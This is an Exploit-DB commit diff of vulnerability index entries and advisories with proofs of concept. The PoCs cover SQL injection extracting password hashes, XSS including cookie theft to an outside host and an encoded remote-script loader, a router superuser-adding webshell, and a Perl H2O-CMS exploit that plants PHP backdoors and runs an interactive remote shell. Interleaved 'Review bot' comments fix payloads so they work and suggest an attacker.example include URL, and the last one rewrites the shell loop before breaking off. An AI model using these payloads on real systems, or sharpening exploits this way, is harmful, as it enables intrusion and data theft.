Updated 03_28_2014

This commit is contained in:
Offensive Security 2014-03-28 04:32:23 +00:00
parent ee58fa916e
commit b4268e8a98
28 changed files with 487 additions and 1 deletions


@ -15269,7 +15269,7 @@ id,file,description,date,author,platform,type,port
17597,platforms/php/webapps/17597.txt,"SiteGenius Blind SQL injection Vulnerability",2011-08-02,"AutoRUN and dR.sqL",php,webapps,0
17600,platforms/windows/local/17600.rb,"Zinf Audio Player 2.2.1 - (.pls) Buffer Overflow Vulnerability (DEP BYPASS)",2011-08-03,"C4SS!0 and h1ch4m",windows,local,0
17601,platforms/windows/dos/17601.py,"Omnicom Alpha 4.0e LPD Server DoS",2011-08-03,"Craig Freyman",windows,dos,0
17602,platforms/php/webapps/17602.txt,"WordPress TimThumb Plugin - Remote Code Execution",2011-08-03,MaXe,php,webapps,0
17602,platforms/php/webapps/17602.txt,"WordPress TimThumb Plugin 1.32 - Remote Code Execution",2011-08-03,MaXe,php,webapps,0
17603,platforms/php/webapps/17603.txt,"Joomla Component (com_jdirectory) SQL Injection Vulnerability",2011-08-03,"Caddy Dz",php,webapps,0
17604,platforms/windows/local/17604.rb,"ABBS Audio Media Player 3.0 - Buffer Overflow Exploit (MSF)",2011-08-04,"James Fitts",windows,local,0
17605,platforms/windows/local/17605.rb,"ABBS Electronic Flashcards 2.1 - Buffer Overflow Exploit (MSF)",2011-08-04,"James Fitts",windows,local,0
@ -29291,3 +29291,30 @@ id,file,description,date,author,platform,type,port
32526,platforms/php/webapps/32526.txt,"ClipShare Pro 4.0 'fullscreen.php' Cross Site Scripting Vulnerability",2008-10-23,ShockShadow,php,webapps,0
32527,platforms/php/webapps/32527.txt,"Adam Wright HTMLTidy 0.5 'html-tidy-logic.php' Cross Site Scripting Vulnerability",2008-10-23,ShockShadow,php,webapps,0
32528,platforms/php/webapps/32528.txt,"iPeGuestbook 1.7/2.0 'pg' Parameter Cross-Site Scripting Vulnerability",2008-10-24,"Ghost Hacker",php,webapps,0
32529,platforms/multiple/remote/32529.java,"Sun Java Web Start 1.0/1.2 Remote Command Execution Vulnerability",2008-10-25,"Varun Srivastava",multiple,remote,0
32530,platforms/linux/remote/32530.txt,"Lynx 2.8 '.mailcap' and '.mime.type' Files Local Code Execution Vulnerability",2008-11-03,"Piotr Engelking",linux,remote,0
32531,platforms/php/webapps/32531.txt,"phpMyAdmin <= 3.0.1 'pmd_pdf.php' Cross Site Scripting Vulnerability",2008-10-27,"Hadi Kiamarsi",php,webapps,0
32532,platforms/php/webapps/32532.txt,"bcoos 1.0.13 'include/common.php' Remote File Include Vulnerability",2008-10-27,Cru3l.b0y,php,webapps,0
32533,platforms/php/webapps/32533.txt,"Tandis CMS 2.5 'index.php' Multiple SQL Injection Vulnerabilities",2008-10-27,G4N0K,php,webapps,0
32534,platforms/unix/dos/32534.py,"Python <= 2.5.2 'Imageop' Module Argument Validation Buffer Overflow Vulnerability",2008-10-27,"Chris Evans",unix,dos,0
32535,platforms/php/webapps/32535.txt,"MyBB 1.4.2 'moderation.php' Cross-Site Scripting Vulnerability",2008-10-27,Kellanved,php,webapps,0
32536,platforms/php/webapps/32536.txt,"bcoos 1.0.13 'modules/banners/click.php' SQL Injection Vulnerability",2008-10-27,DeltahackingTEAM,php,webapps,0
32537,platforms/php/webapps/32537.txt,"All In One 1.4 Control Panel 'cp_polls_results.php' SQL Injection Vulnerability",2008-10-27,ExSploiters,php,webapps,0
32538,platforms/php/webapps/32538.txt,"PHP-Nuke Nuke League Module 'tid' Parameter Cross-Site Scripting Vulnerability",2008-10-28,Ehsan_Hp200,php,webapps,0
32539,platforms/php/webapps/32539.html,"Microsoft Internet Explorer 6.0 '&NBSP;' Address Bar URI Spoofing Vulnerability",2008-10-27,"Amit Klein",php,webapps,0
32540,platforms/php/webapps/32540.pl,"H2O-CMS 3.4 PHP Code Injection and Cookie Authentication Bypass Vulnerabilities",2008-10-28,StAkeR,php,webapps,0
32541,platforms/php/webapps/32541.txt,"H&H Solutions WebSoccer 2.80 'id' SQL Injection Vulnerability",2008-10-28,d3v1l,php,webapps,0
32542,platforms/php/webapps/32542.txt,"Elkagroup Image Gallery 1.0 'view.php' SQL Injection Vulnerability",2008-10-28,G4N0K,php,webapps,0
32543,platforms/php/webapps/32543.txt,"KKE Info Media Kmita Catalogue 2 'search.php' Cross Site Scripting Vulnerability",2008-10-28,cize0f,php,webapps,0
32544,platforms/php/webapps/32544.txt,"KKE Info Media Kmita Gallery Multiple Cross-Site Scripting Vulnerabilities",2008-10-29,cize0f,php,webapps,0
32545,platforms/hardware/webapps/32545.txt,"Allied Telesis AT-RG634A ADSL Broadband Router - Unauthenticated Webshell",2014-03-26,"Groundworks Technologies",hardware,webapps,80
32546,platforms/php/webapps/32546.py,"IBM Tealeaf CX 8.8 - Remote OS Command Injection",2014-03-26,drone,php,webapps,0
32547,platforms/php/webapps/32547.txt,"Extrakt Framework 0.7 'index.php' Cross Site Scripting Vulnerability",2008-10-29,ShockShadow,php,webapps,0
32548,platforms/linux/remote/32548.html,"Opera Web Browser 9.x History Search and Links Panel Cross Site Scripting Vulnerabilities",2008-10-30,"Stefano Di Paola",linux,remote,0
32549,platforms/asp/webapps/32549.txt,"Dorsa CMS 'Default_.aspx' Cross Site Scripting Vulnerability",2008-10-29,Pouya_Server,asp,webapps,0
32550,platforms/windows/dos/32550.html,"Microsoft DebugDiag 1.0 'CrashHangExt.dll' ActiveX Control Remote Denial of Service Vulnerability",2008-10-30,suN8Hclf,windows,dos,0
32551,platforms/linux/dos/32551.txt,"Dovecot 1.1.x Invalid Message Address Parsing Denial of Service Vulnerability",2008-10-30,anonymous,linux,dos,0
32552,platforms/hardware/remote/32552.txt,"SonicWALL Content Filtering Blocked Site Error Page Cross-Site Scripting Vulnerability",2008-10-30,pagvac,hardware,remote,0
32553,platforms/php/webapps/32553.txt,"phpWebSite <= 0.9.3 'links.php' SQL Injection Vulnerability",2008-10-31,"Beenu Arora",php,webapps,0
32554,platforms/php/webapps/32554.txt,"SpitFire Photo Pro 'pages.php' SQL Injection Vulnerability",2008-10-31,"Beenu Arora",php,webapps,0
32555,platforms/windows/remote/32555.html,"Opera Web Browser 9.62 History Search Input Validation Vulnerability",2008-10-31,NeoCoderz,windows,remote,0
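Review bot: The entry for id 32530 (Lynx) is typed `linux,remote` and filed under platforms/linux/remote, although its own title and the 32530.txt advisory added in this commit describe a local code-execution issue; the type column should be `local` (and the file path moved to match) so searches by type do not misfile it. The entry for 32539, an Internet Explorer address-bar spoof, is recorded as `php,webapps` when nothing about it is PHP or server-side — `windows,remote` fits the sibling IE/Opera browser entries. The entry for 32553 titles the issue `phpWebSite <= 0.9.3` while the advisory text added for it says the affected versions are unknown and the vendor disputes the report, so the version bound in the index appears unsupported. The 32551 entry says `Dovecot 1.1.x` where the advisory limits it to 1.1.4 and 1.1.5.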



@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/31992/info
Dorsa CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/Default_.aspx?lang=1&sub=5&Page_=search&order=search&search=%27%3E%3Cscript%3Ealert%28%27Pouya_Server%27%29%3C%2Fscript%3E
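Review bot: The advisory never names the injection point; of the five query parameters in the PoC URL only `search` carries the `'><script>` payload, the others (`lang`, `sub`, `Page_`, `order`) appear to be routing state, and a reader should not have to diff the URL to learn that. A one-line addition would do: `Injection point: the 'search' parameter of Default_.aspx is reflected without encoding; the leading '> suggests it lands inside a quoted attribute — confirm.` Unlike the sibling advisories in this commit, no affected version is recorded here.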


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31998/info
SonicWALL Content Filtering is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input when displaying URI address data in a blocked-site error page.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of an arbitrary site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Versions prior to SonicWALL Content Filtering on SonicOS Enhanced 4.0.1.1 are vulnerable.
http://www.example.com/fuck<script>alert(document.cookie</script>
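Review bot: The PoC URL on the last line is not valid JavaScript: `alert(document.cookie</script>` is missing the closing parenthesis, so the injected script dies with a SyntaxError instead of firing; it should read `http://www.example.com/fuck<script>alert(document.cookie)</script>`. The description's phrase "in the context of an arbitrary site" is the important part and deserves a sentence of its own: the script presumably executes in the origin of whichever blocked URL the victim requested, so the attacker picks the victim origin by picking the blocked host — confirm against the filter's error-page behaviour.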


@ -0,0 +1,87 @@
*Title:*
Allied Telesis AT-RG634A ADSL Broadband router hidden administrative
unauthenticated webshell.
*Vulnerability Information:*
- CVE: CVE-2014-1982
- Type of Vulnerability:
- CWE-78 : OS Command Injection
- CWE-306 : Missing Authentication for Critical Function
*Affected products:*
- Allied Telesis AT-RG634A ADSL Broadband router. (version 3.3+ and
probably others)
Other products like,
- Allied Telesis iMG624A (firmware version, 3.5)
- Allied Telesis iMG616LH (firmware version, +2.4)
- Allied Telesis iMG646BD (firmware version, 3.5)
*Vendor:*
- Allied Telesis : http://www.alliedtelesis.com//
has the same vulnerbility, but the vendor reports that the version
3.8.05 of the firmware has already addressed this issue, but we where
unable to test nor confirm this information.
*Security Patches / Workaround:*
- Allied Telesis has noted that the AT-RG634A product is no longer
supported, but gives a workaround
to mitigate the issue.
Configure the device so that only trusted devices can
access the target device using the following command,
"WEBSERVER SET MANAGEMENTIP <ip-address>"
*Short Description:*
The Allied Telesis AT-RG634A ADSL Broadband router has a hidden url
page in their admnistrative HTTP interface capable of executing
commands as admin without requiring any kind of authentication.
*Description:*
"The AT-RG634 is a full-featured, broadband media gateway and router
designed for cost-effective delivery of advanced IP Triple Play voice,
video and data services over an ADSL infrastructure. The RG634
supports Layer 3 functions, including NAT, DMZ, and Stateful
inspection firewall for delivery of revenue-generating services such
as home networking and security services." (from
www.alliedtelesis.com/p-2345.html)
The Allied Telesis AT-RG634A ADSL Broadband router has a hidden URL
(/cli.html) page to execute CLI command with admin priviledges,
available by default and without any kind of authentication.
Having as impact a total compromise of the target device.
*Steps to reproduce:*
- Connect via HTTP to the hidden page http://<device IP>/cli.html a
input box is shown, every command typed there will be executed as admin.
Entering the following lines in the hidden page (/cli.html) a new
telnet admin user called "eviluser" is added to the system.
>> system add login eviluser system set user eviluser access
>> superuser.
*Credits:*
This security issue was discovered and researched by Sebastian Muniz
(topo), Security Researcher of Groundworks Technologies
(http://www.groundworkstech.com)
*License:*
The contents of this advisory are copyright (c) 2014 Groundworks
Technologies,and are licensed under a Creative Commons Attribution
Non-Commercial Share-Alike 3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/
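Review bot: The reproduction step on the two `>>` lines runs two distinct CLI commands together as one line, `system add login eviluser` and `system set user eviluser access superuser`; they should be listed as two separate entries into the /cli.html input box, otherwise a reader pastes an invalid command and concludes the issue does not reproduce. The published workaround, `WEBSERVER SET MANAGEMENTIP <ip-address>`, only restricts which source address may reach the web server; it neither removes nor authenticates /cli.html, so a host at the trusted address (and presumably a browser on that host lured to a page that submits the same form) keeps unauthenticated command execution — that residual risk belongs under "Security Patches / Workaround". The advisory also does not say whether the page is reachable on the WAN interface by default, which is what decides the real exposure.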

13
platforms/linux/dos/32551.txt Executable file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/31997/info
Dovecot is prone to a remote denial-of-service vulnerability because it fails to handle certain specially crafted email headers.
An attacker can exploit this issue to prevent recipients from accessing their mailboxes.
For an exploit to succeed, the IMAP client connecting to Dovecot must use the FETCH ENVELOPE command.
The issue affects Dovecot 1.1.4 and 1.1.5.
The following invalid message address header is sufficient to trigger this issue:
"From: ("
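Review bot: The trigger description leaves out how the header reaches the server: the `From: (` line must be in a message delivered into the victim's mailbox, and the crash only fires when an IMAP client issues FETCH ENVELOPE on that message, so a short delivery note (`Deliver a message containing the header below to the target mailbox, then FETCH ... ENVELOPE it`) would make the PoC reproducible. Because the message stays in the mailbox, the denial of service presumably recurs on every subsequent fetch until the message is removed server-side — confirm and document, since it changes the remediation from "restart" to "purge the message". The files.csv index entry for this file says `Dovecot 1.1.x` while the text here limits it to 1.1.4 and 1.1.5.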


@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/31917/info
Lynx is prone to a local code-execution vulnerability.
Successful exploits may allow attackers to execute arbitrary code within the context of the user running the affected application.
Versions prior to Lynx 2.8.6rel.4 are affected.
.mime.types:
application/x-bug bug
.mailcap:
application/x-bug; xmessage 'Hello, World!'
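Review bot: The PoC gives the contents of `.mime.types` and `.mailcap` but neither where they must be placed nor what makes Lynx consult them, so it cannot be reproduced from this text alone; presumably the files go in the directory Lynx is started from (the reason a local attacker can plant them — confirm against the 2.8.6rel.4 fix) and Lynx must then open a resource whose type resolves to `application/x-bug`, which given the `bug` extension mapping means a file such as `test.bug`. Two added lines would cover it: `Place both files in the directory from which lynx is launched.` and `Open any file with a .bug extension; xmessage is spawned via the mailcap entry.` The files.csv entry added in this commit types this as `remote`, while the text here correctly calls it local.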


@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/31991/info
Opera Web Browser is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, change the browser's settings, and launch other attacks.
Versions prior to Opera Web Browser 9.62 are vulnerable.
NOTE: The 'History Search' issue described here may be related to the 'History Search' issue that was previously described in BID 31842 'Opera Web Browser Multiple Cross Site Scripting Vulnerabilities'.
<!-- --Aviv. http://aviv.raffon.net/2008/10/30/AdifferentOpera.aspx --> <html> <script> function x() { window.open('opera:historysearch?q=%2A"><img src=\'x\' onerror=\'eval(String.fromCharCode(113,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,83,67,82,73,80,84,34,41,59,113,46,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,114,97,102,102,111,110,46,110,101,116,47,114,101,115,101,97,114,99,104,47,111,112,101,114,97,47,104,105,115,116,111,114,121,47,111,46,106,115,34,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,113,41,59))\'>&p=1&s=1'); window.setTimeout("location.href='mailto:'",4000); } </script> <body scrolling="no"> <a href="#" onclick="x()">Click me...</a> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <img src='x' onerror='eval(String.fromCharCode(113,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,83,67,82,73,80,84,34,41,59,113,46,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,114,97,102,102,111,110,46,110,101,116,47,114,101,115,101,97,114,99,104,47,111,112,101,114,97,47,104,105,115,116,111,114,121,47,111,46,106,115,34,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,113,41,59))'> </body> </html> # milw0rm.com [2008-10-30]
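Review bot: Both `onerror` handlers decode (String.fromCharCode) to `q=document.createElement("SCRIPT");q.src="http://www.raffon.net/research/opera/history/o.js";document.body.appendChild(q);`, so the PoC loads and executes a script from a third-party host inside the opera:historysearch page, and nothing in this file shows what o.js does — whatever that URL serves today is what runs. The decoded payload should be stated in the header comment and the remote `src` replaced with a self-hosted or inline demonstration (an `alert(location)` suffices to prove the privileged context) so the exploit is reviewable and does not phone home. The whole file is also collapsed onto one line, which makes the markup hard to audit.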


@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/31916/info
Sun Java Web Start is prone to a remote command-execution vulnerability.
Successful exploits may allow attackers to execute arbitrary commands on an unsuspecting user's computer. This may aid in further attacks.
We don't know which versions of Java Web Start are affected. We will update this BID when more information is released.
BasicService basicService = (BasicService) ServiceManager.lookup("javax.jnlp.BasicService");
URL mike = new URL("file:\\C:\\music.rm");
basicService.showDocument(mike);
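Review bot: The three-line snippet is a fragment that will not compile as shown: there is no enclosing class, the checked `UnavailableServiceException` from `ServiceManager.lookup` and `MalformedURLException` from `new URL` are not declared or caught, and the literal `"file:\\C:\\music.rm"` produces the string `file:\C:\music.rm` with backslashes rather than a `file:///C:/music.rm` URL. The claimed command execution rests on `showDocument` handing a local file to its registered handler — presumably the `.rm` association — which the advisory should say outright instead of leaving implicit. A header comment stating that this runs inside an (unsigned?) Web Start application and which JNLP permission it needs would make the PoC usable; the versions are marked unknown here while the index entry lists 1.0/1.2.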


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/31928/info
phpMyAdmin is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/pmd_pdf.php?db=>"><script>alert('Hadi-Kiamarsi')</script>
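Review bot: `pmd_pdf.php` is the Designer's PDF export, which in phpMyAdmin is presumably only reachable with a valid session, so this reflected XSS would require the victim to be logged in — that precondition changes the attack from drive-by to targeted and should be stated (and confirmed) in the advisory. Unlike the sibling advisories in this commit, no affected version is listed here; the index entry says `<= 3.0.1`, so a line such as `phpMyAdmin 3.0.1 and earlier are vulnerable; other versions may also be affected.` would keep the two consistent.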


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31929/info
The 'bcoos' program is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
This issue affects 'bcoos' 1.0.13; other versions may also be affected.
http://www.example.com/include/common.php?XOOPS_ROOT_PATH=shell
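Review bot: The PoC value `XOOPS_ROOT_PATH=shell` is a placeholder, not a working include: a remote-file-include needs an attacker-controlled URL, e.g. `XOOPS_ROOT_PATH=http://attacker.example/shell.txt?`, where the trailing `?` neutralises whatever path common.php appends to the constant (presumably — the include statement itself is not shown here). Overriding what is normally a server-side path from the query string also implies `register_globals=On`, and fetching a remote file implies `allow_url_include`/`allow_url_fopen`; those preconditions belong in the advisory because they decide which installations are actually exposed.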

11
platforms/php/webapps/32533.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/31930/info
Tandis CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Tandis CMS 2.5.0 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/index.php?mod=2&nid=-268)%20UNION%20ALL%20SELECT%20version(),0,0,concat(username,0x3a,userpass),0,0,0,0,0,0,0,0,0%20FROM%20default_users
http://www.example.com/[path]/index.php?mod=0&cpage=-114) UNION ALL SELECT 0,0,0,0,0,version()--
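Review bot: The first payload reads `username,userpass` from `default_users`, which assumes the installation kept the `default_` table prefix; that assumption should be stated (`[prefix]_users`) rather than baked into the URL. The two URLs are also encoded inconsistently — the first uses `%20`, the second raw spaces — so the second works when pasted into a browser but not when sent with a tool that does not encode for you; encoding both the same way avoids a false negative.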


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31935/info
MyBB is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
MyBB 1.4.2 is vulnerable; other versions may also be affected.
http://www.example.com/mybb/moderation.php?action=removesubscriptions&ajax=1&url='%2Balert('XSS!')// http://www.example.com/mybb/moderation.php?action=removesubscriptions&ajax=1&url=%27%20%2B%27http://www.example2.com/cookiejar.php?c=%27%2Bdocument.cookie// http://www.example.com/mybb/moderation.php?action=removesubscriptions&ajax=1&url=%27%2Beval(%22u%3D%27application%2Fx-www-%27%2B%20%27form-urlencoded%27%22%2B%20String.fromCharCode(59)%20%2B%22c%3D%27Content-type%27%22%2B%20String.fromCharCode(59)%20%2B%22d%3D%27Content-length%27%22%2B%20String.fromCharCode(59)%20%2B%22reg%3Dnew%20XMLHttpRequest()%22%2B%20String.fromCharCode(59)%20%2B%22reg.open(%27GET%27%2C%20%27http%3A%2F%2Fwww.example%2Fmybb%2Fadmin%2Findex.php%3Fmodule%3Dconfig%2Fmycode%26action%3Dadd%27%2C%20false)%22%2B%20String.fromCharCode(59)%20%2B%22reg.send(null)%22%2B%20String.fromCharCode(59)%20%2B%22r%3Dreg.responseText%22%2B%20String.fromCharCode(59)%20%2B%22t%3D%27http%3A%2F%2Fwww.example%2Fmybb%2Fadmin%2Findex.php%3Fmodule%3Dconfig%2Fmycode%26action%3Dadd%27%22%2B%20String.fromCharCode(59)%20%2B%22t2%3D%27%26replacement%3D%241%26active%3D1%26my_post%22%20%20%20%20%2B%22_key%3D%27%2Br.substr(r.indexOf(%27my_post_%22%20%2B%22key%27%2B%20%27%27) %2B15%2C32)%22%2F*%20%20%20%20%20%20*%2F%2B%22%20%2B%27%26title%3DPwned%26description%27%2B%20%27%3Dfoo%26regex%3D%22%20%20%20%20%20%20%20%2B%22evil(.*)evil%2523e%2500test%27%22%2B%20String.fromCharCode(59)%20%2B%22r2%3Dnew%20XMLHttpRequest()%22%2B%20String.fromCharCode(59)%20%2B%22r2.open(%27POST%27%2Ct%2Cfalse)%22%2B%20String.fromCharCode(59)%20%2B%22r2.setRequestHeader(d%2Ct2.length)%22%2B%20String.fromCharCode(59)%20%2B%22r2.setRequestHeader(c%2Cu)%22%2B%20String.fromCharCode(59)%20%2B%22r2.sendAsBinary(t2)%22%2B%20String.fromCharCode(59))//
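Review bot: The three PoC URLs are run together on a single line and need to be separated; the third one decodes to a script that GETs `admin/index.php?module=config/mycode&action=add`, extracts `my_post_key` from the response, and POSTs a new MyCode rule whose regex is `evil(.*)evil%23e%00test` — which appears to be a preg `e`-modifier injection for code execution — so it is an XSS-to-admin chain that only works when the victim holds a live administrator session, and the advisory should say so. It also depends on `XMLHttpRequest.sendAsBinary`, a Firefox-only method of that era, so the payload will not run in other browsers. A short decoded description of what each URL does would make this reviewable without URL-decoding by hand.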


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31941/info
The 'bcoos' program is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
This issue affects bcoos 1.0.13; other versions may also be affected.
http://www.example.com/[p4th]/modules/banners/click.php?bid=-1' union+select+pass+from+bcoos_users+limit 1,0/*
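Review bot: `limit 1,0` in the PoC is MySQL's (offset 1, row count 0) and therefore returns no rows, so the UNION contributes nothing and the injection looks like a false negative; to pull the first hash the clause should be `limit+0,1` (or simply `limit+1`): `.../modules/banners/click.php?bid=-1' union+select+pass+from+bcoos_users+limit+0,1/*`. The `bcoos_` table prefix is presumably the installer default and should be flagged as an assumption.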


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31949/info
All In One Control Panel (AIOCP) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
AIOCP 1.4 is vulnerable; other versions may also be affected.
http://www.example.com/public/code/cp_polls_results.php?poll_language=eng&poll_id=-0+union+select+0,1,2,version(),4,5,6--


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/31952/info
PHP-Nuke Nuke League module is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/modules.php?name=League&file=index&op=team&tid=[XSS]


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31960/info
Internet Explorer is affected by a URI-spoofing vulnerability because it fails to adequately handle specific combinations of the non-breaking space character ('&NBSP;').
An attacker may leverage this issue to spoof the source URI of a site presented to an unsuspecting user. This may lead to a false sense of trust because the user may be presented with a source URI of a trusted site while interacting with the attacker's malicious site.
Internet Explorer 6 is affected by this issue.
<a href="http://www.example.com&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n <http://www.example.com&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n/> bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;& nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n bsp;&nbsp;.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;.phish.site/">Example</a> (In words, this is <a href="http://www.example.com <http://www.example.com/> followed by 30 ampersand-NBSP-semicolon, followed by a dot followed by another 31 ampersand-NBSP-semicolon followed by a dot, followed by 13 ampersand-NBSP-semicolon followed by a dot followed by phish.site/">Example</a>) This causes a link whose URL appears, IN THE ADDRESS BAR, as (may wrap around): http://www.example.com . . .phish.site/ (In words, this appears like "http://www.example.com" <http://www.example.com%22/> ; followed by 30 spaces, a dot, 31 spaces, a dot, 13 spaces, a dot and finally "phish.site/")
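Review bot: The PoC markup was mangled by a mail client before it was archived: the `<http://www.example.com&nbsp;…&n/>` fragments are auto-inserted hyperlinks that split `&nbsp;` into `&n` and `bsp;` (and insert stray spaces such as `& nbsp;`), so copying the first `<a href=...>` verbatim yields broken entities rather than the 30/31/13 runs of `&nbsp;` the prose describes. The prose ("30 ampersand-NBSP-semicolon, a dot, 31, a dot, 13, a dot, phish.site/") is the authoritative specification; a clean anchor regenerated from it should replace the mangled one, e.g. `<a href="http://www.example.com` followed by exactly those entity runs and `.phish.site/">Example</a>`, with the rest of the line kept as explanation.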

79
platforms/php/webapps/32540.pl Executable file

@ -0,0 +1,79 @@
source: http://www.securityfocus.com/bid/31961/info
H2O-CMS is prone to a PHP code-injection vulnerability and a cookie authentication-bypass vulnerability.
An attacker can exploit the PHP code-injection issue to inject and execute arbitrary malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
Attackers can exploit the cookie authentication-bypass vulnerability to gain administrative access; this may aid in further attacks.
Versions up to and including H2O-CMS 3.4 are vulnerable.
#!/usr/bin/perl
# ----------------------------------------------------------
# H2O-CMS <= 3.4 Remote Command Execution Exploit (mq = Off)
# Discovered By StAkeR[at]hotmail[dot]it
# Download On http://sourceforge.net/projects/h2o-cms
# ----------------------------------------------------------
use strict;
use LWP::UserAgent;
use LWP::Simple;
my $post;
my $sysc;
my $host = shift or athos();
my $auth = "user=admin&id=1&admin=1";
my $http = new LWP::UserAgent;
my $write = {
'site_title' => '";""; error_reporting(0); echo"//athos"; "',
'db_server' => '";""; include($_REQUEST["i"]); "',
'db_name' => '";""; eval($_REQUEST["g"]); "',
'db_username' => '";""; echo shell_exec($_REQUEST["c"]); "',
'db_password' => '";""; echo system($_REQUEST["s"]); "',
'save' => 'Save',
};
$http->default_header('Cookie' => $auth);
$post = $http->post($host.'/index.php?option=SaveConfig',$write);
sub start_exec
{
my $site = shift @_;
my $exec = shift @_;
my $view = get($site.'/includes/config.php?c='.$exec);
return $view;
}
sub athos
{
print STDOUT "# Usage: perl $0 http://[host]\n";
print STDOUT "# Remote Command Execution Exploit\n";
exit;
}
unless(get($host) =~ /\/\/athos/i)
{
print STDOUT "# Exploit Failed!\n";
exit;
}
else
{
while(1)
{
if(defined start_exec($host,$sysc))
{
print STDOUT "[athos-shell] ~# ";
chomp($sysc = <STDIN>);
print STDOUT "[athos-shell] ~# ".start_exec($host,$sysc)."\n";
}
}
}
__END__
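Review bot: Every command typed into the interactive loop is executed twice on the target: `start_exec($host,$sysc)` is called once in the `if(defined ...)` test and again inside the `print` three lines later, and on the very first pass `$sysc` is still undef so an empty `c=` request is sent before any prompt; non-idempotent commands (`rm`, `useradd`, `mv`) will misbehave. The command is also concatenated into the query string unencoded, so anything containing `&`, `#`, `+` or `%` is truncated or altered by the server's parsing. Call the shell exactly once per line and encode it with `uri_escape` (add `use URI::Escape;` next to the LWP imports; URI ships with the LWP stack the script already needs). The cookie `user=admin&id=1&admin=1` is sent as one cookie whose value contains `&` — presumably the format H2O-CMS parses, but it reads like a typo for `; ` and deserves a comment.
```perl
# … unchanged: config injection, start_exec(), athos(), the //athos check …
while(1)
{
    print STDOUT "[athos-shell] ~# ";
    my $line = <STDIN>;
    last unless defined $line;                       # EOF ends the shell
    chomp($line);
    next if $line eq '';                             # nothing to send
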